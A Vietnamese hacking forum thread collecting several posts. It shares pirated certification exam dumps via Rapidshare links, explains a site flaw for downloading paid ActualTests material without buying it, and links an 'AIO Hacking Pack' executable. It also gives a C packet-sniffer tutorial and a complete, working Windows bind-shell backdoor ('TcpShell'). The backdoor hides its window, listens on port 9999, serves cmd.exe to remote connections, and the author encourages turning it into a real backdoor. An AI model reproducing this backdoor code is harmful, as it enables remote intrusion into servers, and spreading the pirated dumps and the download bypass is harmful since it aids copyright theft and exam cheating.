|
|
Vẫn còn download tốt !!!!!
|
|
|
Tất cả đề thi của Pass4sure, bạn nào quan tâm đến certificate nào thì hãy download đi kẻo hết
Link download
Code:
http://rapidshare.com/users/6YYYKI
http://rapidshare.com/files/19087158/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part01.rar
http://rapidshare.com/files/19104611/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part02.rar
http://rapidshare.com/files/19108096/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part03.rar
http://rapidshare.com/files/19110112/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part04.rar
http://rapidshare.com/files/19171980/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part05.rar
http://rapidshare.com/files/19174622/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part06.rar
http://rapidshare.com/files/19177182/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part07.rar
http://rapidshare.com/files/19538865/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part08.rar
http://rapidshare.com/files/19516921/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part09.rar
http://rapidshare.com/files/19519623/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part10.rar
http://rapidshare.com/files/19522067/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part11.rar
http://rapidshare.com/files/19524120/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part12.rar
http://rapidshare.com/files/19526625/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part13.rar
http://rapidshare.com/files/19529025/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part14.rar
http://rapidshare.com/files/19531252/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part15.rar
http://rapidshare.com/files/19533879/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part16.rar
http://rapidshare.com/files/19357631/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part17.rar
http://rapidshare.com/files/19360195/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part18.rar
http://rapidshare.com/files/19362783/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part19.rar
http://rapidshare.com/files/19365488/LearnBits_-_Pass4Sure_-_Authorized_Examsbyfreenow.part20.rar
http://lix.in/a2f1e4
http://lix.in/b6a172
http://lix.in/d782fa
http://lix.in/cfeec2
http://lix.in/2fc74d
http://lix.in/44f94e
http://lix.in/d9cb70
http://lix.in/77db08
http://lix.in/a9071e
http://lix.in/ecea77
http://lix.in/033e5a
http://lix.in/22a29d
http://lix.in/9f06bc
http://lix.in/10e892
http://lix.in/fe1b15
http://lix.in/0dbab5
http://lix.in/25ba38
http://lix.in/79139a
http://lix.in/a56209
http://lix.in/1fa19d
http://lix.in/a2f1e4
http://lix.in/b6a172
http://lix.in/d782fa
http://lix.in/cfeec2
http://lix.in/2fc74d
http://lix.in/44f94e
http://lix.in/d9cb70
http://lix.in/77db08
http://lix.in/a9071e
http://lix.in/ecea77
http://lix.in/33a978
http://lix.in/053e5d
http://lix.in/99f516
http://lix.in/a11055
http://lix.in/fa7858
http://lix.in/f86eeb
http://lix.in/3769ef
http://lix.in/a1e1e7
http://lix.in/e0561f
http://lix.in/19df2d
Tổng cộng dung lượng: 728.44 MB :cry:
|
|
|
Mấy bạn lo download đi chứ không fix. Nếu như trong quá trình download có gặp lỗi là không tìm thấy file thì lưu ý là cần phải nhập đúng định dạng xxx-xxx. Ví dụ mã đề 70-305 thi về .NET của Microsoft thì link download phải thêm số 0 (trở thành 070-305) phía trước mới download được ! :wink:
|
|
|
Nếu ai luyên thi các chứng chỉ quốc tế thì tài liệu mà Testking và ActualTest soạn ra chắc ai cũng biết.
Trang web www.actualtests.com có lỗi cho phép mình download tài liệu cũng như câu hỏi để ôn thi các chứng chỉ mà không cần phải mua nó.
Download nhanh nhanh chứ không nó fix :lol
Bước 1
Vào trang web www.actualtests.com.
Đăng kí một account (đăng kí tài khoản là miễn phí nên an tâm )
Bước 2
Sau khi đăng kí xong tài khoản (rất nhanh chỉ cần email và pass) Bạn muốn download tài liệu và đề thi nào thì theo hai link sau
Link download đề thi
Code:
http://downloads.actualtests.com/Pdf-Down/uploads/xxx-xxx.zip
Link download tài liệu
Code:
http://downloads.actualtests.com/Pdf-Down/uploads/xxx-xxxsg.zip
Các bạn thay xxx-xxx bằng mã đề mà mình muốn download
Giả sử mình muốn download đề và tài liệu về CCNA chẳng hạn
CCNA thì có mà đề 640-801, thay xxx-xxx bằng 640-801 thi link download đề là
Code:
http://downloads.actualtests.com/Pdf-Down/uploads/640-801.zip
Link tài liệu sẽ là
Code:
http://downloads.actualtests.com/Pdf-Down/uploads/640-801sg.zip
Download nhanh lên các bạn ơi kẻo hết, ấy quên kẻo nó fix !!!! :wink:
|
|
|
Mình lập topic này để mọi người cùng nhau chia sẻ kinh nghiệm cũng như tài liệu trong khi luyện thi các chứng chỉ quốc tế, làm sao để đậu là được roài (Mục đích học lấy được bằng thì tất nhiên rồi và quan trong là để vận dụng cho công việc của mình nữa. Hì hì)
Có rất nhiều trang web đưa các đề thi của Testking, AutualTest, ... Nhưng mình thấy trang web http://examcollection.com là nhanh và có đầy đủ do các thành viên thi gửi bài thi lên theo dạng vce và cũng như kinh nghiệm thi của họ để mình tham khảo tại forum của trang web.
Phần mềm có thể đọc được các vce các bạn có thể download tại đây
I. Quan tâm nhiều nhất chắc là bằng CCNA của Cisco
Mã đề: 640-801
Tài liệu: Cisco Networking Academy Program
Đề luyện: Testking có thể lấy tại trang examcollection.com. Nhưng theo mình thì sử dụng pass4sure bởi vì pass4sure.com cũng lấy từ Testking ra nhưng nó không có câu lặp như Testking.
Các bạn muốn có phiên bản Testking mới nhất cho CCNA hay là những bằng nào thi về các chứng chỉ thuộc Cisco thì vào trang net130.com (Trang tiếng China )), kệ nó vì đề thi Testking nó vẫn để chữ Testking chứ không phải tiếng China, mà muốn dịch cả trang này sang tiếng Anh thì cũng có thể sử dụng translate web của google).
Lab thực hành: Có thể sử dụng Boson (Lab ảo), theo mình thì có lab thật thì tốt nhất vì đồ giả sao bằng đồ thật được . Mà sau này cũng làm việc trên đồ thật mà .
Lệ phí thi: 165$ (hồi trước mình thi là nộp chừng đó, kô biết bây giờ là bao nhiêu)
II. Những bạn nào quan tâm về bảo mật thì theo mình có thể thi các các chứng chỉ như: Security+, CEH, MCSE, ...
Theo mình thì có thể bắt đầu bằng Security+ bởi vì mình thấy khi học chứng chỉ này sẽ tao cho mình những kiến thức nền tảng nhất định về Security, cũng nhưng có những khái niệm ban đầu khi bước vào security
Mã đề: SY0-101
Tài liệu: Sybex Security Study Guide 3rd, Còn đọc nhanh để thi lấy bằng nhanh (mì ăn liền ) thì đọc Security Plus Fast Pass Sybex (Tất cả mình đính kèm theo sau đây để các bạn có thể download )
Đề luyện: tương tư như trên sử dụng Testking
Lab thực hành : Không có, quá đã ))))))
Lệ phí thi: 265$ (Đắt quá trời ơi !!! <--không biết bây giờ bao nhiêu)
Những ai có kinh nghiệm thi các chứng chỉ khác thì có thể gửi tài liệu cũng nói kinh nghiệm của mọi người cùng tham khảo, theo mình thì không nên dựa quá nhiều vào bộ đề Testking bởi vì khi mình thi CCNA thì pass4sure có câu hỏi đúng có thể đến 80% nhưng khi mình thi Security+ thì chỉ có khoảng 10 câu trong Testking trong khi mình luyện bộ Testking mới nhất là đã đến hơn 800 câu !!! Oạch !!!
Quan trọng là học để mình ứng dụng trong công việc sau này, và học toàn bộ tài liệu thì cho dù nó có ra đề kiểu gì cũng có thể làm được chứ dựa vào bộ đề và ôm bộ đề miết khi nó ra trật một cái thì ......... tiền lệ phí thi không cánh mà bay (. Hix hix
Chúc các bạn thành công !
|
|
|
E hèm. Trang web nhóm vicki sẽ dự kiến là mở lại với địa chỉ vickigroup.com. Nhưng mà do công việc của mình và vicki bận qué nên chưa cho mở lại, sợ "đẻ" con ra không ai nuôi ))
|
|
|
Link: http://rapidshare.com/files/3944849/AIO_Hacking_Pack_v1.exe
Nên sử dụng phần mềm này để test hệ thống của mình )
|
|
|
Bài này mình hướng dẫn các bạn viết một sniffer (nghe lén) packet đơn giản trên Windows. Để lập trình được thì cần các bạn hiểu rõ cách lập trình socket trong ngôn ngữ C.
Với cách lập trình socket thông thường chúng ta sử dụng SOCK_STREAM, SOCK_DGRAM tức lập trình ở mức Application của mạng mà thôi, để lập trình ở mức IP (tức tầng Network trong 4 tầng của Internet: Tầng vật lý --> Tầng Ip--> Tầng TCP --> Tầng ứng dụng) sử dụng SOCK_RAW là một dạng socket "thô"
Điều đầu tiên bao giờ chúng ta cũng phải khởi tạo thư viện Winsocket
Hàm khởi tạo thư viện như sau:
Code:
void InitWinSock()
{
WSADATA wsaData;
if (WSAStartup(MAKEWORD(1,1),&wsaData)!=0) return;
}
Chi tiết hàm WSAStartup có thể xem trợ giúp của MSDN ...
Cách tạo một Raw Socket như sau:
Code:
int CreateRawSocket()
{
int sock;
if ((sock=WSASocket(AF_INET,SOCK_RAW,0,NULL,NULL,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET) return 0;
return sock;
}
Hàm trên trả về một sock mới nếu như không gặp lỗi
Như chúng ta đã biết mô hình mạng Internet được phân chia thành 4 tầng (Tầng vật lý <--> Tầng Ip<--> Tầng TCP <--> Tầng ứng dụng) tương ứng với 7 tầng của mô hình OSI (Tầng vật lý <--> Tầng liên kết <--> Tầng mạng <--> Tầng vận chuyển <--> Tầng phiên <---> Tầng trình diễn <--> Tầng ứng dụng). Mình khỏi phải nhắc lại mô hình OSI như thế nào vì có rất nhiều bài viết trong diễn đàn đã nói đến OSI
Giới thiệu cấu trúc của gói IP, TCP, ICMP
a. Gói IP (ở tầng IP)
Định nghĩa một struct mô tả gói IP
Code:
struct ip_hdr{
unsigned char ver_ihl; //<-- Version (4 bits) + Internet Header Length (4 bits)
unsigned char tos; //<-- Type Of Service
unsigned short tol_len //<-- Total Length (Ip Header + TCP Header + Data)
unsigned short id //<-- Identification
unsigned short offset //<-- Frame Offset trong đó 8 bits cho flags
unsigned char ttl //<-- Time to Live
unsigned char protocol //<-- Protocol
unsigned short checksum//<-- Header Checksum
unsigned int saddr //<-- Source Address
unsigned int daddr //<-- Destination Address
};
b. Gói TCP
Định nghĩa một struct mô tả gói TCP
Code:
struct tcp_hdr{
unsigned short sport //<-- Source Port
unsigned short dport //<-- Destiantion Port
unsigned int seq_num //<-- Sequence Number
unsigned int ack_num //<-- Acknowledgment Number
unsigned char dataoffset//<--Data Offset
unsigned char flags //Flags: SYN, ACK, FIN, RST, PUSH, URG (2 bits) + 6 bits Reserve
unsigned short window //Windows
unsigned short checksum //Checksum
unsigned short urgpointer //Urgent Pointer
}
c. Gói ICMP
Định nghĩa một struct mô tả gói ICMP
Code:
struct icmp_hdr{
unsigned char type //Type
unsigned char code //Code
unsigned short checksum
unsigned short id //Identification
unsigned short sequence
unsigned short timestamp
}
Ở trên là toàn bộ định nghĩa về các gói IP, ICMP, TCP. Trong bài này mình chỉ hướng dẫn bắt các gói TCP và ICMP mà thôi, còn các gói khác thì có thể làm tương tự
Code:
#include <winsock2.h>
#include <stdio.h>
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
#pragma comment (lib,"ws2_32.lib")
void InitWinSock();
int CreateRawSocket();
int Sniffer(int sock);
int packetcapture(char *packet);
int tcp_display(struct ip_hdr *ip,struct tcp_hdr *tcp);
int icmp_display(struct ip_hdr *ip,struct icmp_hdr *icmp);
struct ip_hdr
{
unsigned char ver_ihl;//VER va IHL (Internet Header Length)
unsigned char tos; //Type of Server
unsigned short tol_len;//Total Length=IpHeader + TCP Header + Data
unsigned short id; //Identification
unsigned short offset; //Frame offset
unsigned char ttl; //Time To Live
unsigned char protocol;
unsigned short checksum;
unsigned int saddr; //Source Address
unsigned int daddr; //Destination Address
};
struct tcp_hdr
{
unsigned short sport; //Source Port
unsigned short dport; //Detinations Port
unsigned int seqnum; //Sequence;
unsigned int acknum; //Acknowlege
unsigned char dataoffset; //Data Offset
unsigned char flags; //SYN, URG, FIN, ACK, RST, PUSH + Preserve
unsigned short windows;
unsigned short checksum;
unsigned short urgpointer;
};
struct icmp_hdr
{
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned short id;
unsigned short sequence;
unsigned short timestamp;
};
int socksniffer;
int main()
{
InitWinSock();
socksniffer=CreateRawSocket();
printf("Seamoun (http://nhomvicki.net)\n");
printf("Sniffer TCP, ICMP v1.0\n\n");
printf(" Packet Capture ...\n");
Sniffer(socksniffer);
return 0;
}
//Ham khoi tao thu vien WinSock
void InitWinSock()
{
WSADATA wsaData;
if (WSAStartup(MAKEWORD(1,1),&wsaData)!=0) return;
}
//Ham tao RawSocket
int CreateRawSocket()
{
int sock;
if ((sock=WSASocket(AF_INET,SOCK_RAW,0,NULL,NULL,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET) return 0;
return sock;
}
//Ham thuc hien Sniffer
int Sniffer(int sock)
{
DWORD dwBufferLen[10], dwBufferInLen = 1, dwBytesReturned = 0;
char *HostName=new char [32];
unsigned long nSize=32;
struct hostent *hp;
sockaddr_in from,dest;
int sread,fromlen=sizeof(from);
char *packet=new char [2048];
if (GetComputerName(HostName,&nSize)==0) return -1;
if ((hp=gethostbyname(HostName))==0) return -1;
delete(HostName);
int i=0;
while ((hp->h_addr_list[i+1])!=NULL)
{
i++;
}
memcpy(&from.sin_addr.s_addr,hp->h_addr_list[i],hp->h_length);
if ((hp=gethostbyname(inet_ntoa(from.sin_addr)))==NULL) return -1;
memset(&dest,0,sizeof(dest));
memcpy(&dest.sin_addr.s_addr,hp->h_addr_list[0],hp->h_length);
dest.sin_family=AF_INET;
dest.sin_port=htons(8000);
if (bind(sock,(struct sockaddr *)&dest,sizeof(dest))==SOCKET_ERROR) return -1;
//WSAIoctl : dieu khien vao ra socket
if(WSAIoctl(sock, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR) return(-1);
//Don nhan va su ly goi du lieu
while (1)
{
sread=recvfrom(sock,packet,8191,0,(struct sockaddr *)&from.sin_addr,&fromlen);
if ((sread==SOCKET_ERROR)||sread<0) continue ;
packetcapture(packet);
}
delete(packet);
return 0;
}
//Ham thuc hien phan tich goi du lieu
int packetcapture(char *packet)
{
struct ip_hdr *ip;
struct tcp_hdr *tcp;
struct icmp_hdr *icmp;
ip=(struct ip_hdr *)packet;
tcp=(struct tcp_hdr *)(packet+sizeof(struct ip_hdr));
icmp=(struct icmp_hdr *)(packet+sizeof(struct ip_hdr));
switch(ip->protocol)
{
case 6:
tcp_display(ip,tcp);
break;
case 1:
icmp_display(ip,icmp);
break;
default:
break;
}
return 0;
}
//Ham hien thi goi TCP
int tcp_display(ip_hdr *ip,tcp_hdr *tcp)
{
printf("TCP: [%d] %s:%d", ntohs(ip->tol_len), inet_ntoa(*(struct in_addr *)&ip->saddr), ntohs(tcp->sport));
printf(" > %s:%d|ttl = %d|win = %d|checksum = %d|flag = %d\n\n", inet_ntoa(*(struct in_addr *)&ip->daddr),
ntohs(tcp->dport), ip->ttl, ntohs(tcp->windows), tcp->checksum, tcp->flags);
return 0;
}
//Ham hien thi goi ICMP
int icmp_display(struct ip_hdr *ip, struct icmp_hdr *icmp)
{
printf("ICMP: [%d] %s", ntohs(ip->tol_len), inet_ntoa(*(struct in_addr *)&ip->saddr));
printf(" > %s type = %d|code = %d|ttl = %d|seq = %x\n", inet_ntoa(*(struct in_addr *)&ip->daddr), icmp->type, icmp->code, ip->ttl, ntohs(icmp->sequence));
return 0;
}
Kết quả khi chạy chương trình
+ Thực hiện gửi gói ICMP bằng cách dùng lệnh PING
Code:
C:\>ping 10.0.0.2
Reply from 10.0.0.2: bytes=32 time<10ms TTL=64
Reply from 10.0.0.2: bytes=32 time=15ms TTL=64
Reply from 10.0.0.2: bytes=32 time=15ms TTL=64
Reply from 10.0.0.2: bytes=32 time=15ms TTL=64
Ping statistics for 10.0.0.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 15ms, Average = 11ms
Chương trình Sniffer:
Seamoun (http://nhomvicki.net)
Sniffer TCP, ICMP v1.0
Packet Capture ...
ICMP: [60] 10.0.0.1 > 10.0.0.2 type = 8|code = 0|ttl = 128|seq = 3d00
ICMP: [60] 10.0.0.2 > 10.0.0.1 type = 0|code = 0|ttl = 64|seq = 3d00
ICMP: [60] 10.0.0.1 > 10.0.0.2 type = 8|code = 0|ttl = 128|seq = 3e00
ICMP: [60] 10.0.0.2 > 10.0.0.1 type = 0|code = 0|ttl = 64|seq = 3e00
ICMP: [60] 10.0.0.1 > 10.0.0.2 type = 8|code = 0|ttl = 128|seq = 3f00
ICMP: [60] 10.0.0.2 > 10.0.0.1 type = 0|code = 0|ttl = 64|seq = 3f00
ICMP: [60] 10.0.0.1 > 10.0.0.2 type = 8|code = 0|ttl = 128|seq = 4000
ICMP: [60] 10.0.0.2 > 10.0.0.1 type = 0|code = 0|ttl = 64|seq = 4000
+Thực hiện gửi gói TCP bằng netcat
Code:
C:\>nx -vv -n 10.0.0.1
Chương trình Sniffer:
Seamoun (http://nhomvicki.net)
Sniffer TCP, ICMP v1.0
Packet Capture ...
TCP: [64] 10.0.0.1:80 > 10.0.0.2:1033|ttl = 128|win = 64240|checksum = 55340|flag = 18
TCP: [60] 10.0.0.2:1033 > 10.0.0.1:80|ttl = 64|win = 5840|checksum = 5942|flag = 2
TCP: [52] 10.0.0.2:1033 > 10.0.0.1:80|ttl = 64|win = 5840|checksum = 23589|flag = 16
Mình post lại bài này vì không thấy còn trên HVA . Chắc do mất DB đợt trước
|
|
|
Nguyên tắc là cách làm việc của backdoor không giải thích các bạn cũng biết nó gì và cách sử dụng chúng như nào. Một khi backdoor được cài lên giúp kẻ tấn công sẽ thuận tiện hơn khi trở lại server mà mình đã tấn công vào, điều mà chúng ta cần biết là cách viết đổ cmd.exe tử backdoor (tức là kẻ tấn công có shell khi đã có backdoor được cài trên server) như thế nào ?
Đoạn mã viết dưới đây không phải là backdoor mà chỉ đơn thuần là một phần công việc của backdoor. Sau đây mình sẽ hướng dẫn cách viết đổ cmd.exe như thế nào ?
Code:
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define PORT 9999 //<--Dat cong lang nghe la 9999
#define BANNER "Seamoun (http://nhomvicki.net) - TcpShell 1.0\n"
#define MAXRECVBUF 1000 //Bo dem toi da khi nhan
#define MAXPIPEBUF 1000 //Bo dem toi da cua pipe
#define WM_SHELL WM_USER+1 //Tinh huong tu dinh nghia
#define MyClass "Seamoun" //Ten lop
#define MyApp "Seamoun" //Ten ung dung
#pragma comment(lib,"wsock32.lib") //Gop thu vien wsock32.lib
HANDLE hThread_out;
DWORD dwChildThreadIdOut;
SECURITY_ATTRIBUTES sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hPipeOutputRead,hPipeOutputWrite,hPipeInputRead,hPipeInputWrite;
BOOL NowUsing;
int sock_listen,sock;
sockaddr_in addrServer;
void GetShell (HWND hwnd,WPARAM wParam,LPARAM lParam);
int WndProc(HWND hwnd,UINT msg,WPARAM wParam,LPARAM lParam);
DWORD __stdcall OutSocket(LPVOID lpData);
int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
{
HWND hwnd;
MSG msg;
WNDCLASSEX wc;
wc.cbClsExtra=0;
wc.cbSize=sizeof(wc);
wc.cbWndExtra=0;
wc.hbrBackground=(HBRUSH)COLOR_WINDOW;
wc.hCursor=LoadCursor(NULL,IDC_ARROW);
wc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wc.hIconSm=0;
wc.hInstance=hInstance;
wc.lpfnWndProc=(WNDPROC)WndProc;
wc.lpszClassName=MyClass;
wc.lpszMenuName=0;
wc.style=CS_HREDRAW|CS_VREDRAW;
RegisterClassEx(&wc);
hwnd=CreateWindowEx(NULL,MyClass,MyApp,WS_OVERLAPPEDWINDOW,0,0,0,0,NULL,NULL,hInstance,NULL);
ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
while (GetMessage(&msg,0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
int WndProc(HWND hwnd,UINT msg,WPARAM wParam,LPARAM lParam)
{
WSADATA wsaData;
switch(msg)
{
case WM_CREATE:
if (WSAStartup(MAKEWORD(1,1),&wsaData)!=0) return -1;
if ((sock_listen=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET) return -1;
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(PORT);
addrServer.sin_addr.s_addr=htonl(INADDR_ANY);
memset(&addrServer.sin_zero,'\0',8);
if (bind(sock_listen,(struct sockaddr *)&addrServer,sizeof(addrServer))==SOCKET_ERROR) return -1;
if (listen(sock_listen,1)==SOCKET_ERROR) return -1;
if (WSAAsyncSelect(sock_listen,hwnd,WM_SHELL,
FD_CLOSE|FD_ACCEPT|FD_READ|FD_WRITE)==SOCKET_ERROR) return -1;
NowUsing=FALSE;
break;
case WM_CLOSE:
PostQuitMessage(wParam);
break;
case WM_SHELL:
GetShell(hwnd,wParam,lParam);
default:
return (DefWindowProc(hwnd,msg,wParam,lParam));
}
return 0;
}
void GetShell (HWND hwnd,WPARAM wParam,LPARAM lParam)
{
long lEvent=WSAGETSELECTEVENT(lParam);
static char buf[MAXRECVBUF];
DWORD dwNumberOfBytesWrite;
int sock_tmp;
UINT r;
sockaddr_in addrClient;
int sizeClient=sizeof(addrClient);
if (lEvent==FD_ACCEPT)
{
if ((sock_tmp=accept(sock_listen,(struct sockaddr *)&addrClient,&sizeClient))==INVALID_SOCKET)
if (WSAGetLastError()!=WSAEWOULDBLOCK) return;
if (NowUsing==TRUE)
{
closesocket(sock_tmp);
return;
}
sock=sock_tmp;
send(sock,BANNER,strlen(BANNER),0);
NowUsing=TRUE;
sa.nLength=sizeof(sa);
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hPipeOutputRead,&hPipeOutputWrite,&sa,5000);
CreatePipe(&hPipeInputRead,&hPipeInputWrite,&sa,5000);
memset((void *)&si,'\0',sizeof(si));
memset((void *)&pi,'\0',sizeof(pi));
si.cb=sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=hPipeInputRead;
si.hStdOutput=hPipeOutputWrite;
si.hStdError=hPipeOutputWrite;
CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,0,NULL,TEXT("c:\\"),&si,&pi);
CloseHandle(hPipeInputRead);
CloseHandle(hPipeOutputWrite);
hThread_out=CreateThread(NULL,0,OutSocket,NULL,NULL,&dwChildThreadIdOut);
return;
}
else if (lEvent==FD_CLOSE)
{
closesocket(sock);
TerminateProcess(pi.hProcess,0);
TerminateThread(hThread_out,0);
CloseHandle(pi.hProcess);
CloseHandle(hPipeOutputRead);
CloseHandle(hPipeInputWrite);
NowUsing=FALSE;
}
if ((r=recv(sock,buf,MAXRECVBUF,0))==SOCKET_ERROR) return;
buf[r]=0;
WriteFile(hPipeInputWrite,&buf,r,&dwNumberOfBytesWrite,NULL);
}
DWORD __stdcall OutSocket(LPVOID lpData)
{
char szBuffer[MAXPIPEBUF];
DWORD dwNumberOfBytesRead;
for (;;)
{
if (ReadFile(hPipeOutputRead,&szBuffer,MAXPIPEBUF,&dwNumberOfBytesRead,NULL)==FALSE) continue;
if (dwNumberOfBytesRead<=0) continue;
FlushFileBuffers(hPipeOutputRead);
szBuffer[dwNumberOfBytesRead]=0;
send(sock,szBuffer,dwNumberOfBytesRead,0);
}
return 0;
}
Với đoan mã trên thì phần đăng kí và tạo ra window thì đơn giản, các bạn có thể tham khảo cách lập trình C trên Windows. Để khỏi dài dòng mình chỉ nói phần đổ cmd.exe như thế nào mà thôi !
1) Trong tình huống WM_CREATE (tức là khi đang tạo Windows) chúng ta có đoạn mã sau:
Code:
if (WSAStartup(MAKEWORD(1,1),&wsaData)!=0) return -1;//<-- Khởi tạo thư viện winsocket
if ((sock_listen=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET) return -1; //<--Tạo socket listen
//Định nghĩa giá trị cho biến cấu trúc sockaddr_in addrServer
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(PORT);
addrServer.sin_addr.s_addr=htonl(INADDR_ANY);
memset(&addrServer.sin_zero,'\0',8);
//--------------------------------------------------------------------
if (bind(sock_listen,(struct sockaddr *)&addrServer,sizeof(addrServer))==SOCKET_ERROR) return -1;//Bind socket listen
if (listen(sock_listen,1)==SOCKET_ERROR) return -1; //<-- Đặt chế độ lắng nghe
//Tạo những tình huống riêng (ở đây mình lấy tên tình huống riêng là WM_SHELL các bạn có thể lấy tên khác tùy ý miễn là nó được định nghĩa WM_USER +x)
if (WSAAsyncSelect(sock_listen,hwnd,WM_SHELL,
FD_CLOSE|FD_ACCEPT|FD_READ|FD_WRITE)==SOCKET_ERROR) return -1;
NowUsing=FALSE; //<--Đây đơn giản là biến dùng để đánh dấu socket đang dùng hay là không dùng nữa
2) Giải thích mã của hai hàm GetShell và OutSocket
Code:
a) Hàm GetShell (HWND hwnd,WPARAM wParam,LPARAM lParam)
long lEvent=WSAGETSELECTEVENT(lParam); //<--Lấy sự kiện
static char buf[MAXRECVBUF]; //Khai báo biến buf để
DWORD dwNumberOfBytesWrite; //
int sock_tmp; //<--Khai báo một socket trung gian
UINT r;
sockaddr_in addrClient;
int sizeClient=sizeof(addrClient);
//Khi có kết nối đến từ máy client - Ở đây kết nối được chấp nhận và sử lý như sau
if (lEvent==FD_ACCEPT)
{
if ((sock_tmp=accept(sock_listen,(struct sockaddr *)&addrClient,&sizeClient))==INVALID_SOCKET)
if (WSAGetLastError()!=WSAEWOULDBLOCK) return;
//Nếu như đang sử dụng thì đóng socket này lại
if (NowUsing==TRUE)
{
closesocket(sock_tmp);
return;
}
sock=sock_tmp;
send(sock,BANNER,strlen(BANNER),0);
NowUsing=TRUE;
sa.nLength=sizeof(sa);
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
//Tạo hai ống dẫn dùng để đổ cmd.exe. Một ống dùng để nhận lệnh từ client gửi đến và một ống dùng để xuất kết quả trả về cho client
CreatePipe(&hPipeOutputRead,&hPipeOutputWrite,&sa,5000);
CreatePipe(&hPipeInputRead,&hPipeInputWrite,&sa,5000);
memset((void *)&si,'\0',sizeof(si));
memset((void *)&pi,'\0',sizeof(pi));
//Khởi tạo một số thông số cho biến cấu trúc si (Startup Information: thông tin khởi động)
si.cb=sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=hPipeInputRead;
si.hStdOutput=hPipeOutputWrite;
si.hStdError=hPipeOutputWrite;
//Tạo một tiến trình mới. Mà ở đây là chạy cmd.exe CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,0,NULL,TEXT("c:\\"),&si,&pi);
CloseHandle(hPipeInputRead);
CloseHandle(hPipeOutputWrite);
//Tạo luồng trong tiến trình mới với mục đích là đọc ghi dữ liệu
hThread_out=CreateThread(NULL,0,OutSocket,NULL,NULL,&dwChildThreadIdOut);
return;
}
else if (lEvent==FD_CLOSE)
{
//Đóng tất các các handle khi xuất hiện tình huống FD_CLOSE
closesocket(sock);
TerminateProcess(pi.hProcess,0);
TerminateThread(hThread_out,0);
CloseHandle(pi.hProcess);
CloseHandle(hPipeOutputRead);
CloseHandle(hPipeInputWrite);
NowUsing=FALSE;
}
if ((r=recv(sock,buf,MAXRECVBUF,0))==SOCKET_ERROR) return;
buf[r]=0;
//Nhận dữ liệu từ client và ghi đến CMD.EXE
WriteFile(hPipeInputWrite,&buf,r,&dwNumberOfBytesWrite,NULL);
}
3) Giải thích mã hàm OutSocket
Code:
DWORD __stdcall OutSocket(LPVOID lpData)
{
char szBuffer[MAXPIPEBUF];
DWORD dwNumberOfBytesRead;
//Tạo vòng lặp vô tận để nhận kết quả trả về từ CMD.EXE
for (;;)
{
if (ReadFile(hPipeOutputRead,&szBuffer,MAXPIPEBUF,&dwNumberOfBytesRead,NULL)==FALSE) continue;
if (dwNumberOfBytesRead<=0) continue;
FlushFileBuffers(hPipeOutputRead);
szBuffer[dwNumberOfBytesRead]=0; //<-- Thêm kí tự kết thúc chuỗi trong dữ liệu trả về
//Hiển thị kết quả CMD.EXE trả về ra màn hình client
send(sock,szBuffer,dwNumberOfBytesRead,0);
}
return 0;
}
Biên dịch đoạn mã trên và thực thi nó sẽ có kết quả như sau:
tcpshell sẽ lắng nghe trên cổng 9999. Chúng ta kết nối đến cổng 9999 bằng netcat để xem tcpshell đổ cmd.exe như thế nào
Code:
d:\>nx -vv -n 10.0.0.1 9999
(UNKNOWN) [10.0.0.1] 9999 (?) open
Seamoun (http://nhomvicki.net) - TcpShell 1.0
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
c:\> <--- Vậy là đã có shell
Sau bài này các bạn có thể phát triển tiếp cho mã trên trở thành một con backdoor thực sự !
Bài này mình viết lâu roài. Đã post lên HVA rồi mà hổng biết sao tìm hổng thấy bài này nên mình post lại
|
|
|
Có 270MB chứ mấy
Link
http://rapidshare.com/files/7547949/MAIO.part1.rar
http://rapidshare.com/files/7550356/MAIO.part2.rar
